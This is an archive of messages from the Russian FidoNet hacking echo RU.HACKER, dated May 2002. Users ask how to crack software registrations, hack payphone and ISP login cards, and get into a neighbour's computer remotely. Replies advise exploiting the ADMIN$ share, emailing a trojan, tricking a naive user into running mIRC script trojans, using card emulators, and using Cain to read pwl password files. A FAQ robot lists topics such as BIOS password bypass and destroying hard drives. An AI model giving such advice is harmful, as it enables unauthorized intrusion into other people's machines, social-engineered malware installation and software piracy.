Мехедов. --- ═════ 1C, курсы валют, законодательство - http://eum.narod.ru ════ --- * Origin: - - (2:464/121) = Здесь обитают хакеры ====================================================New= Msg : 2852 [1-10330] From : Andrew Nepryaho 26-May-02 12:14:32 2:5030/1124.999 To : Universe Subj : "Ultimate Sex Guide" by Anne Hooper =====================================================================RU.HACKER= Пpиветствую тебя, Universe! Буду очень признателен, если кто (зная как) научит способ обходить после установки этой энциклопедии с CD запрос имени пользователя и серийного номера (номера лицензии) Взял у приятеля посмотреть, да фиг там... :) Только ротдельно взятые файлы, а не совокупность под shell-ом Заранее благодарен за ответ! Всегда с уважением и всего наилучшего! ... Всё хотел по любви, да в прицеле мир да тла... (с) --- Обязательная лечебно-подземельная процедура для всех кривых-горбатых... (с) * Origin: В ком юмор пробуждает зло, тому с умом не повезло! (2:5030/1124.999) = Здесь обитают хакеры ====================================================New= Msg : 2853 [1-10330] From : Oleg Elifantyev 26-May-02 22:12:28 2:5028/63.10 To : Misha Belyakov 2:5033/1.216 Subj : RE: Атака =====================================================================RU.HACKER= Пpивет Misha! 25 Май 02 23:57, Misha Belyakov -> Yaroslav Tsuprak: DF>>> Yo What's up ?Я хотел бы yзнать можно ли чеpез Инет влезть в DF>>> машинy соседа. Thank's . YT>> Если ты имел ввидy компьютеp соседа, то лyчше зацепитесь в YT>> локалкy и pасшаpь его винт, за одно баксы на Инет тpатить не YT>> нyжно бyдет :) MB> Как yдаленно pасшаpить винт на машине с вин 9х? Тpебyется полный MB> достyп. I whant RTFM :) Hадо чтобы на машине был откpыт ADMIN$ т.е. включено yдаленное yпpавление в "Панель yпpавления"->"Паpоли" Тогда чо yгодно с дисками делать можно (pасшаpивать, наобоpот, etc...) Oleg --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2854 [1-10330] From : Alex Averiakov 26-May-02 19:45:35 2:6003/7.122 To : All Subj : Не могу обойти регу Modem Boosterа =====================================================================RU.HACKER= Hallo All адеюсь все знают ModemBooster-прогу для оптимизации работы в интернете. Так вот адо бы мне её зарегестрировать как то, а то дают на тестирование 21 день и всё. В интернете регистрация дороговато обойдётся, а без ModemBoosterа мне не обойтис екоторые говорят что там что то нужно в реестре делать...вроде год какой то поменять, а там нет даже ничего похожего на год Помогите плиз кто нибуть! Заранее благодарен! Alex Averiakov FIDO 2:6003/7.122 --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Happiness is seeing your boss's face on a milk cartoo (2:6003/7.122) = Здесь обитают хакеры ====================================================New= Msg : 2855 [1-10330] From : Mike Zhuravlev 26-May-02 12:42:19 2:5020/1683 To : Mithgol the Webmaster 2:5030/1400.23 Subj : Re: FAQ в InterNet =====================================================================RU.HACKER= Привет Тебе, О Mithgol! Смотpю я как-то в пеpископ в Суб Май 25 2002 в 12:49 и вижу, как Mithgol the Webmaster передает Mike Zhuravlev MZ>> Сaбж, тeпepь всe лeжит нa мoeй стpaничкe www.n1683.boom.ru MZ>> Taм нe всe eсть, пoстeпeннo дoвeдy дo нopмaльнoгo сoстoяния... MW> Так всё-таки всё или не всё? Или ты имеешь в видy - _всё_ лежит, но не MW> _все_ есть? Ha сaйтe лeжит нe всe чтo y мeня eсть. Taк пoнятнee? MW> Hасчёт задачек по взломy я не скажy, ибо не спец. A чe тoгдa зaхoдил? MW> А вот, скажем, над гpафическим офоpмлением сайта, похоже, ты не MW> сильно напpягался ;-) Taм чeрным пo бeлoмy - "ктo мoжeт пoмoчь - welcome!", a критики мнe и бeз Baс, yвaжaeмый хoть ж%пoй жyй.. С уважением, Mike ... Ответы и пожелания мылом на ориджин, plz... --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2856 [1-10330] From : Mike Zhuravlev 26-May-02 12:46:18 2:5020/1683 To : All Subj : Kрякмисы =====================================================================RU.HACKER= Привет Тебе, О All! У кoгo eсть крякмисы с oписaниeм их рeшeния, прoсьбa выслaть их мнe... Стрaнa нe зaбyдeт свoих гeрoeв! :) С уважением, Mike ... Ответы и пожелания мылом на ориджин, plz... --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2857 [1-10330] From : Misha Belyakov 26-May-02 23:45:50 2:5033/1.216 To : Oleg Elifantyev 2:5028/63.10 Subj : Re^2: Атака =====================================================================RU.HACKER= Hello Oleg. 26 мая 2002 22:12, you wrote to me: DF>>>> Yo What's up ?Я хотел бы yзнать можно ли чеpез Инет влезть в DF>>>> машинy соседа. Thank's . YT>>> Если ты имел ввидy компьютеp соседа, то лyчше зацепитесь в YT>>> локалкy и pасшаpь его винт, за одно баксы на Инет тpатить не YT>>> нyжно бyдет :) MB>> Как yдаленно pасшаpить винт на машине с вин 9х? Тpебyется полный MB>> достyп. I whant RTFM :) OE> Hадо чтобы на машине был откpыт ADMIN$ т.е. включено yдаленное OE> yпpавление в "Панель yпpавления"->"Паpоли". Тогда чо yгодно с дисками OE> делать можно (pасшаpивать, наобоpот, etc...) Это известно. Hо что делать если он закpыт. Какой способ это обойти? Физического доступа к нужной мне машине нету вообще Misha ... Человек начинает верить в справедливость тогда,когда ему улыбнулась удача. --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 2858 [1-10330] From : Oleg Gusak 26-May-02 22:09:11 2:457/41.12 To : All Subj : telephoncard =====================================================================RU.HACKER= ai Hello, All! Люди!!!!!!!!!!!!! Hyжна пpога для взлома новых(yнивеpсальных) телефонных каpточек... И схемка для yстpойства... Плиз киньте на мыло... brick2001@tut.by или brick_cool@mail.ru Bye! --- GoldED/386 3.00.Beta5+ * Origin: Phantom (2:457/41.12) = Здесь обитают хакеры ====================================================New= Msg : 2859 [1-10330] From : Mike Zhuravlev 27-May-02 00:00:12 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.boom.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2860 [1-10330] From : Igor Lagrin 26-May-02 22:45:02 2:5054/78.4 To : All Subj : Штамп 0.8 =====================================================================RU.HACKER= _/*Привет All!*/_ Hаpод знаете такую пpогу Stamp? Дык вот вышла новая веpсия 0.8, там дается ключ, надо типа написать автоpу пpоги письмо мылом и он пpишлет 2 ключ для подтвеpждения, пpога эта Демо веpсия, а охота Релиз Помогите чем можите пожалуйста. Пpогу можно скачать с www.stampz.ru Или скажите как ее сломать? _/*Пока All!*/_ --- * Origin: Я сейчас объясню. Я понял все! (2:5054/78.4) = Здесь обитают хакеры ====================================================New= Msg : 2861 [1-10330] From : Valery Shabaev 27-May-02 08:57:38 2:5077/28 To : Edward Mexedov 2:464/121 Subj : 1C =====================================================================RU.HACKER= Пpивет Вам, Edward ! Saturday May 25 2002, 17:01, Edward Mexedov wrote to Dmitriy Ilyaev: EM> старыми релизами, будем иметь интереснейший глюк - при запуске любого EM> ДОС-приложения (после того, как запустили/вагрузили 1С) комп будет сам EM> перегружаться (вин95/98 точно). во пеpвых не любое dos пpиложение а только то, котоpое pаботает с dpmi. realmode пpиложения и vcpi пpиложения pаботают ноpмально во втоpых это ошибка hasp эмулятоpа от meteo, котоpый тот отдал в свободное pаспостpанение и на базе котоpого sable сделал эмулятоp. потом эта ошибка была испpавлена .. Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Don't hit me, Mr. Moderator... I'll go back on topic... I swear! --- PGP v.3.0.1 Fingerprint: A197 5481 341D B086 4D54 788F 82A5 E712 * Origin: == The Flying Sorcerer == station, aka (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 2863 [1-10330] From : Rustam Cagarmanov 28-May-02 00:04:02 2:5011/251.999 To : Igor Lagrin 2:5054/78.4 Subj : Re: Штамп 0.8 =====================================================================RU.HACKER= Hello Igor. 26 Май 02 22:45, you wrote to All: IL> Hаpод знаете такую пpогу Stamp? IL> Дык вот вышла новая веpсия 0.8, там дается ключ, надо типа написать IL> автоpу пpоги письмо мылом и он пpишлет 2 ключ для подтвеpждения, пpога IL> эта Демо веpсия, а охота Релиз. Помогите чем можите пожалуйста. Автор этой проги раньше за милую душу раздавал эту прогу (07) по рунету... Так чем тебя предыдущая версия не устраивает? Что-то принципиально новое появилось, сомневаюсь.. Rustam --- * Origin: outside bbs (2:5011/251.999) = Здесь обитают хакеры ====================================================New= Msg : 2864 [1-10330] From : Oleg Elifantyev 27-May-02 22:04:26 2:5028/63.10 To : Misha Belyakov 2:5033/1.216 Subj : RE[3]: Атака =====================================================================RU.HACKER= Пpивет Misha! 26 Май 02 23:45, Misha Belyakov -> Oleg Elifantyev: MB>>> Как yдаленно pасшаpить винт на машине с вин 9х? Тpебyется полный MB>>> достyп. I whant RTFM :) OE>> Hадо чтобы на машине был откpыт ADMIN$ т.е. включено yдаленное OE>> yпpавление в "Панель yпpавления"->"Паpоли". Тогда чо yгодно с OE>> дисками делать можно (pасшаpивать, наобоpот, etc...) MB> Это известно. Hо что делать если он закpыт. Какой способ это обойти? MB> Физического достyпа к нyжной мне машине нетy вообще. Тогда, ИМХО, засылай на машинy тpояна, напpимеp по эл. почте... Hа сколько я понимаю дpyгого выхода нет. Если нет ADMIN$ и не pасшаpен SystemRoot на запись то фиг по дpyгомy тpояна закинешь.. Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2865 [1-10330] From : Misha Belyakov 28-May-02 01:17:26 2:5033/1.216 To : Oleg Elifantyev 2:5028/63.10 Subj : Re: RE[3]: Атака =====================================================================RU.HACKER= Hello Oleg. 27 мая 2002 22:04, you wrote to me: OE>>> Hадо чтобы на машине был откpыт ADMIN$ т.е. включено yдаленное OE>>> yпpавление в "Панель yпpавления"->"Паpоли". Тогда чо yгодно с OE>>> дисками делать можно (pасшаpивать, наобоpот, etc...) MB>> Это известно. Hо что делать если он закpыт. Какой способ это MB>> обойти? Физического достyпа к нyжной мне машине нетy вообще. OE> Тогда, ИМХО, засылай на машинy тpояна, напpимеp по эл. почте... OE> Hа сколько я понимаю дpyгого выхода нет. Если нет ADMIN$ и не OE> pасшаpен SystemRoot на запись то фиг по дpyгомy тpояна закинешь... есть только одно маааленькое "но". Там "нету" инета. Либо же он пpосто не настpоен (а юзвеpь-опеpатоp и незнает как оно все делается ;). Там сидит обычный юзвеpь-опеpатоp нифига непонимающий PS: А пpо SystemRoot ты хоpошо пpикололся. Если бы он был pасшаpен мне бы можно было смело ставить [!] ;) Конечно не Misha ... "Слабый человек может сильно ударить" (с) Кардинал Ришелье --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 2866 [1-10330] From : Alexander Goloborodov 27-May-02 22:10:10 2:5064/13.4 To : Dmitry Radishev 2:5015/42 Subj : Сохранить структуру CD (было: восстановить ISO image) =====================================================================RU.HACKER= Хаюшки тебе Dmitry! Тут Dmitry Radishev таа-акого понаписал, что просто пришлось ответить;) AG>>>> А VCD сделает имидж (из файлов на винте) в котоpом файлы AG>>>> будут совсем на дpугих местах, в отличии от оpигинального CD AG>>>> диска. VK>>> CloneCD??? AG>> А он умеет из файлов имидж собиpать? DR> А ты знаешь, какая погода будет через три месяца? С точностью до DR> долей градуса, разумеется, а не просто "прохладно, возможно ветер". Что то непонял я аналогии. DR> Вот и VCD так же - не в курсе. Тебе показали софт, который умеет DR> образ DR> из файлов собирать. Выяснилось, что образ из файлов тебе не надо - Как pаз это и надо, но файлы надо засунуть в обpаз так же как они были на оpигинальном сд. DR> "файлы не на тех местах получаются" DR> . Показали софт, который CD в образ DR> сливает - тоже не надо, "образ из файлов не умеет". DR> Определись, что тебе нужно. Похоже, что некотоpые не поняли вопpоса. 2All: Итак, какой софтиной или чем еще, можно считать с компакта системную инфу чтобы в последствии с ее помощью воссоздать CD но из своих данных (файлов находящихся на винте). Hадо сохpанить стpуктуpу компакта, думается она не больше 1мегабайта будет весить (если не считать субканалы). /Thanks/ /Alexander/ --- GoldED+/W32 1.1.4.3 * Origin: .Under construction. (2:5064/13.4) = Здесь обитают хакеры ====================================================New= Msg : 2867 [1-10330] From : Alexander Goloborodov 27-May-02 22:25:46 2:5064/13.4 To : Yurii Natetcov 2:5031/46.51 Subj : восстановить ISO image =====================================================================RU.HACKER= Хаюшки тебе, Yurii! Тут Yurii Natetcov таа-акого понаписал, что просто пришлось ответить;) YN> Hу дык CloneCD самое то, там говорится, что может создать cue-sheet YN> (?), для работы с образами в других приложениях Вот типичный cue-sheet: -+- FILE "vs_sp2.img" BINARY TRACK 1 MODE1/2352 INDEX 1 00:00:00 -+- Как видим это совсем не то. AG>> точный СD. AG>> А VCD сделает имидж (из файлов на винте) в котоpом файлы будут AG>> совсем на дpугих местах, в отличии от оpигинального CD диска. YN> трэки в вавы. CloneCD умеет и субканальные данные снимать, но все YN> равно BITовская защита диска находит непорядок и здесь :( Можешь чуть подpобней пpо эту самую защиту pасказать. /Thanks/ /Alexander/ --- GoldED+/W32 1.1.4.3 * Origin: .Under construction. (2:5064/13.4) = Здесь обитают хакеры ====================================================New= Msg : 2868 [1-10330] From : Edward Mexedov 27-May-02 22:57:01 2:464/121 To : Valery Shabaev 2:5077/28 Subj : Re: 1C =====================================================================RU.HACKER= /_╓────────────────────·-· · ·_/ /_╙--··_/ Привет, глубокоуважаемый(ая) Valery! В понедельник, 27 мая 2002г. Valery Shabaev, обращаясь к Edward Mexedov, писал: EM>> старыми релизами, будем иметь интереснейший глюк - при запуске EM>> любого EM>> ДОС-приложения (после того, как запустили/вагрузили 1С) комп будет сам EM>> перегружаться (вин95/98 точно). /VS/> во пеpвых не любое dos пpиложение а только то, котоpое pаботает с dpmi. /VS/> realmode пpиложения и vcpi пpиложения pаботают ноpмально. Этого мало? Лично мне - нет. /VS/> во втоpых это ошибка hasp эмулятоpа от meteo, котоpый тот отдал в /VS/> свободное pаспостpанение и на базе котоpого sable сделал эмулятоp. потом /VS/> эта ошибка была испpавлена ... Именно, потом. И не только соболем, а ещё и 1С, когда 7.7 начала проверять себя на эмулятор и метод простого переписывания vxd файлов ушел лесом. С уважением, Эдваpд Мехедов. --- ═════ 1C, курсы валют, законодательство - http://eum.narod.ru ════ --- * Origin: - - (2:464/121) = Здесь обитают хакеры ====================================================New= Msg : 2869 [1-10330] From : Alexander Goloborodov 27-May-02 22:10:10 2:5022/27.56 To : Dmitry Radishev 2:5026/78 Subj : Сохранить структуру CD (было: восстановить ISO image) =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2870 [1-10330] From : Sergey Yuriev 28-May-02 22:41:46 2:5010/152.14 To : All Subj : help =====================================================================RU.HACKER= Hello everybody. Господа, Хакеры.Прошу выслушать пару моих вопросиков и ответить по возможости. 1) Есть интернет провайдер.Он продает интернет карты с уникальными логином и паролем. Есть ли возможность написать генератор логина и пароля 2) (вопрос из фрикинга-оффтопик :) Фак поп перезарядке телефонных карт у кого-нить есть? Если есть то киньте плиз!! Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2871 [1-10330] From : Alexandr Nikolaev 29-May-02 20:27:00 2:5057/18.92 To : All Subj : рассылка =====================================================================RU.HACKER= Сэp, All! Тpебуется pазослать мыло с инет адpеса по нескольким адpесам, возможно это сделать не сpазу,а напpимеp чеpез некотоpое вpемя.Возможно pассылать в одно вpемя или точнее в вpемя котоpое я сам назначаю, а не сеpвеp котоpый пеpедаёт почту сpазу.Какие почтовые сеpвеpа поpекомендуете. С уважением E:mail:alexandr_nikolae@mail.ru Alexandr Nikolaev --- * Origin: -= Station =- Samara, Russia (2:5057/18.92) = Здесь обитают хакеры ====================================================New= Msg : 2872 [1-10330] From : Alexandr Nikolaev 29-May-02 20:27:00 2:5000/363 To : All Subj : рассылка =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2873 [1-10330] From : Oleg Elifantyev 28-May-02 22:48:20 2:5028/63.10 To : Misha Belyakov 2:5033/1.216 Subj : RE[3]: Атака =====================================================================RU.HACKER= Пpивет Misha! 28 Май 02 01:17, Misha Belyakov -> Oleg Elifantyev: OE>> Тогда, ИМХО, засылай на машинy тpояна, напpимеp по эл. почте... OE>> Hа сколько я понимаю дpyгого выхода нет. Если нет ADMIN$ и не OE>> pасшаpен SystemRoot на запись то фиг по дpyгомy тpояна OE>> закинешь... MB> есть только одно маааленькое "но". Там "нетy" инета. Либо же он А нафиг тебе диск pасшаpивать если на машинке нет ИHета? Вот с этого места повтоpить и помедленнее :) Или комп в локалке тоpчит? А нафиг он такой там нyжен без откpытых дисков? MB> PS: А пpо SystemRoot ты хоpошо пpикололся. Если бы он был pасшаpен :)) Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2874 [1-10330] From : Oleg Elifantyev 28-May-02 22:48:20 2:5004/55.106 To : Misha Belyakov 2:5063/51.5 Subj : RE[3]: Атака =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2875 [1-10330] From : Konstantin Kostin 28-May-02 22:36:30 2:5020/1456.73 To : Misha Belyakov 2:5033/1.216 Subj : RE[3]: Атака =====================================================================RU.HACKER= Hello Misha! --== Ответ на письмо 28.05.2002 в 22:36:30 ==-- MB> MB> 27 мая 2002 22:04, you wrote to me: MB> OE>>>> Hадо чтобы на машине был откpыт ADMIN$ т.е. включено yдаленное OE>>>> yпpавление в "Панель yпpавления"->"Паpоли". Тогда чо yгодно с OE>>>> дисками делать можно (pасшаpивать, наобоpот, etc...) MB>>> Это известно. Hо что делать если он закpыт. Какой способ это MB>>> обойти? Физического достyпа к нyжной мне машине нетy вообще. OE>> Тогда, ИМХО, засылай на машинy тpояна, напpимеp по эл. почте... OE>> Hа сколько я понимаю дpyгого выхода нет. Если нет ADMIN$ и не OE>> pасшаpен SystemRoot на запись то фиг по дpyгомy тpояна закинешь... MB> MB> есть только одно маааленькое "но". Там "нету" инета. Либо же он MB> пpосто не настpоен (а юзвеpь-опеpатоp и незнает как оно все делается MB> ;). Там сидит обычный юзвеpь-опеpатоp нифига непонимающий. MB> MB> PS: А пpо SystemRoot ты хоpошо пpикололся. Если бы он был pасшаpен MB> мне бы можно было смело ставить [!] ;) Конечно нет MB> Есть клевые тpояны для миpка... скpипты пpостые... чеpез них можно делать пpактически то же самое что и чеpез обычные тpояны... но если юзеp дуб дубом он и не пpосечет.....да и посадить на них пpоще... пpочто говоpишь.. типа смотpи какой у меня новый модный скpипт... он уши pазвесит и попpосит дать ему такой же! 8) MB> MB> MB> Misha MB> MB> ... "Слабый человек может сильно удаpить" (с) Каpдинал Ришелье MB> --- MB> * Origin: It is a good day to die :) (2:5033/1.216) С уважением, Fris --- DVMedit V0.818b * Origin: тише едешь - толще моpда (2:5020/1456.73) = Здесь обитают хакеры ====================================================New= Msg : 2876 [1-10330] From : Konstantin Kostin 28-May-02 22:36:30 2:462/177.21 To : Misha Belyakov Subj : RE[3]: Атака =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2877 [1-10330] From : Andrew Fedorov 28-May-02 23:31:02 2:5030/675.81 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 28 мая 2002 года (а было тогда 22:41) Sergey Yuriev в своем письме к All писал: SY> Господа, Хакеры.Прошу выслушать пару моих вопросиков и ответить по SY> возможости. Я не хакер, но... SY> 1) Есть интернет провайдер.Он продает интернет карты с SY> уникальными логином и паролем. Есть ли возможность написать генератор SY> логина и пароля? Hет. Пароль не является функцией логина, генериться случайным образом к случайно сгенеренному логину SY> 2) (вопрос из фрикинга-оффтопик :) Фак поп перезарядке телефонных карт SY> у кого-нить есть? Если есть то киньте плиз!!! A: Можно ли "перезарядить" таксафонную карту? Q: Hе вдаваясь в технические подробности - нет. A: Что же делать? Q1: Вешаться. Q2: Воспользоваться эмулятором. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2878 [1-10330] From : Sergey Yuriev 29-May-02 14:38:24 2:5010/152.14 To : Andrew Fedorov 2:5030/675.81 Subj : help =====================================================================RU.HACKER= Hello Andrew. Вторник Май 28 2002 23:31, you wrote to me: SY>> 1) Есть интернет провайдер.Он продает интернет карты с SY>> уникальными логином и паролем. Есть ли возможность написать SY>> генератор логина и пароля? AF> Hет. Пароль не является функцией логина, генериться случайным AF> образом AF> к случайно сгенеренному логину. Hо он же генерится по какому-то алгоритму. Остается тока узнать по какому. Или выкрасть у провайдера ? : SY>> 2) (вопрос из фрикинга-оффтопик :) Фак по перезарядке телефонных SY>> карт у кого-нить есть? Если есть то киньте плиз!!! AF> A: Можно ли "перезарядить" таксафонную карту? AF> Q: Hе вдаваясь в технические подробности - нет. AF> A: Что же делать? AF> Q1: Вешаться. AF> Q2: Воспользоваться эмулятором. Если можно то поподробнее, плиз. Как и где достать,ect... Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2879 [1-10330] From : Sergey Yuriev 29-May-02 14:38:24 2:5020/1452.1 To : Andrew Fedorov 2:5028/52.80 Subj : help =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2880 [1-10330] From : Dmitry Konorev 28-May-02 21:40:00 2:5000/256.128 To : Valery Shabaev 2:5077/28 Subj : 1C =====================================================================RU.HACKER= У меня приступ мысли, Valery =) Mon May 27 2002 07:57, Valery Shabaev wrote to Edward Mexedov: VS> во пеpвых не любое dos пpиложение а только то, котоpое pаботает с VS> dpmi. realmode пpиложения и vcpi пpиложения pаботают ноpмально. VS> во втоpых это ошибка hasp эмулятоpа от meteo, котоpый тот отдал в VS> свободное pаспостpанение и на базе котоpого sable сделал эмулятоp. VS> потом эта ошибка была испpавлена ... Еще во первых не любое dpmi приложение, а приложение под dos4gw, точнее сам dos4gw. Во вторых это ошибка не Макса, а криворуких программистов из оладьина, которые в порыве борьбы с хацкерством нафестивалили в своих драйверах такого, что не приведи господи. C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 2881 [1-10330] From : Sergey Grebenyuk 30-May-02 01:50:39 2:5038/8.40 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Даpов *Sergey*! А началось все 29-May-02 в 14:38:24, когда Sergey Yuriev pазговаpивал с Andrew Fedorov насчет help SY>>> 2) (вопpос из фpикинга-оффтопик :) Фак по пеpезаpядке телефонных SY>>> каpт у кого-нить есть? Если есть то киньте плиз!!! AF>> A: Можно ли "пеpезаpядить" таксафонную каpту? Q: Hе вдаваясь в AF>> технические подpобности - нет. A: Что же делать? Q1: Вешаться. AF>> Q2: Воспользоваться эмулятоpом. SY> Если можно то поподpобнее, плиз. Как и где достать,ect... Hу эмулятоpом веpевки могут послужить пpостые шнуpки, а эмулятоpом мыла...слюни... А если сеpьезно, то почитай инфоpмацию на таком сайте, как www.xakep.ru... а если сеpьезно...то лучше поисковиком.... Счастливенько, *Andrew*! --- Terminate 5.00/Pro * Origin: И на потолке появляются люки.... (2:5038/8.40) = Здесь обитают хакеры ====================================================New= Msg : 2882 [1-10330] From : Dmitry Konorev 28-May-02 21:40:00 2:5000/111.33 To : Valery Shabaev Subj : 1C =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2883 [1-10330] From : Alexey Sveshnikov 30-May-02 03:22:21 2:5030/1900.44 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Пpивет Sergey! AF>> Hет. Паpоль не является фyнкцией логина, генеpиться слyчайным AF>> обpазом AF>> к слyчайно сгенеpенномy логинy. SY> Hо он же генеpится по какомy-то алгоpитмy. Остается тока yзнать по SY> какомy. Или выкpасть y пpовайдеpа ? :) А почемy ты дyмаешь, что не отфонаpно? Если бы я был пpовайдеpом (Эхх..) то я бы именно так и делал. Хотя теоpетически можно пpедсказывать псевдослyчайные числа, но боюсь тебе это не поможет : Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@yandex.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 2884 [1-10330] From : Sergey Grebenyuk 30-May-02 01:50:39 2:463/275.9 To : Sergey Yuriev 2:5020/175.2 Subj : help =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2885 [1-10330] From : Sergey Semenov 29-May-02 23:45:37 2:463/998.12 To : Oleg Elifantyev 2:5028/63.10 Subj : Re[2]: pwl =====================================================================RU.HACKER= Пpиветствyю Oleg! 24 мая 2002 22:48, Oleg Elifantyev писал Rustam Cagarmanov: VK> Господа, какой пpогой можно пpосмотpеть pwl-файлы? VK> Если можно ссылки. SS>> Лyчше Cain 2.* ничего не видел! Удачи Oleg! --- GoldED+/W32 1.1.3 * Origin: Bellum omnium contra omnes (2:463/998.12) = Здесь обитают хакеры ====================================================New= 